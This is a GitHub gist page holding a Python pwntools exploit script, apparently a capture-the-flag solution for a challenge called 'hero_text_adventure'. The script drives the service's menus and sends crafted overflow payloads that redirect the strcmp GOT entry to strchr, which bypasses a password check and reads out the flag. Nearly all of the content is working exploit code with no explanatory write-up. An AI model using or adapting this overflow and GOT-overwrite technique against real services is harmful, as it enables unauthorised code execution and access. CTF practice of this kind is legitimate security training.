-
-
Save akiym/2ace41cc04705e20031f8666183c1150 to your computer and use it in GitHub Desktop.
hero_text_adventure
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import random | |
from pwn import * | |
context.update(arch='amd64', os='linux') | |
p, u = pack, unpack | |
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r' | |
if REMOTE: | |
host = '' | |
port = 0 | |
else: | |
host = '127.0.0.1' | |
port = 4000 | |
s = remote(host, port) | |
s.recvuntil('(y/N)\n') | |
s.send('n\n') | |
s.recvuntil(':\n') | |
s.send('A' * 0x20) | |
s.recvuntil('5) Thor\n') | |
s.send('5\n') | |
s.recvuntil('6) exit\n') | |
s.send('1337\n') | |
s.send('1000000\n') | |
for i in range(1, 6): | |
s.recvuntil('6) exit\n') | |
s.send('2\n') | |
s.send('%d\n' % i) | |
s.recvuntil('6) exit\n') | |
s.send('3\n') | |
s.send('1\n') | |
s.recvuntil('6) exit\n') | |
s.send('4\n') | |
payload = ( | |
'A' * 0x20 + | |
p32(0x400C8C) + | |
'' | |
) | |
s.send(payload) | |
s.recvuntil('6) exit\n') | |
s.send('3\n') | |
s.send('2\n') | |
s.recvuntil('6) exit\n') | |
s.send('4\n') | |
s.send('C' * 0x24) | |
s.send('1\n') | |
payload = ( | |
'A' * 0x20 + | |
'A' * 0x20 + | |
p32(1) + | |
p32(1) + | |
p32(1) + | |
p32(1) + | |
p32(1) + | |
p32(1) + | |
p(0x603088-0x18) + # strcmp@got | |
'' | |
) | |
s.send(payload + '\n') | |
s.recvuntil('6) exit\n') | |
s.send('4\n') | |
s.recvuntil('to be?\n') | |
s.send(p(0x4009F0) + '\n') # strchr@got.plt | |
s.recvuntil('6) exit\n') | |
s.send('5\n') | |
adventure_id = 7128973612576618926 | |
s.send('%d\n' % adventure_id) | |
s.send('\n') | |
s.recvuntil('Enter the password\n') | |
flag = s.recvuntil(', what would you like to do?', drop=True) | |
print flag |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment